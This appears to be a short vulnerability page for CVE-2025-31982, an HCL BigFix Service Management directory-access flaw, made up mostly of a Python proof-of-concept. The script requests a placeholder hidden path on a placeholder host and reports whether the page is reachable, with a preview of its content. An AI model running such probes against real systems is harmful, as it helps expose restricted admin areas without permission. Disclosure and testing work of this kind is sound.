CVE-2025-31982 HCL BigFix SM目录访问漏洞

import requests # PoC for CVE-2025-31982: HCL BigFix SM Directory Access # Target: HCL BigFix Service Management def check_hidden_directory(base_url, hidden_path): """ Checks if a hidden directory is accessible directly. """ target_url = f"{base_url}/{hidden_path}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: response = requests.get(target_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Vulnerability Confirmed: {target_url} is accessible.") print(f"[+] Response Content Preview: {response.text[:200]}") return True else: print(f"[-] Directory not accessible or non-existent. Status Code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": # Example usage target = "http://target-host:port" # Note: Replace 'hidden_admin_dir' with the actual path disclosed in the vulnerability report path = "hidden_admin_dir" check_hidden_directory(target, path)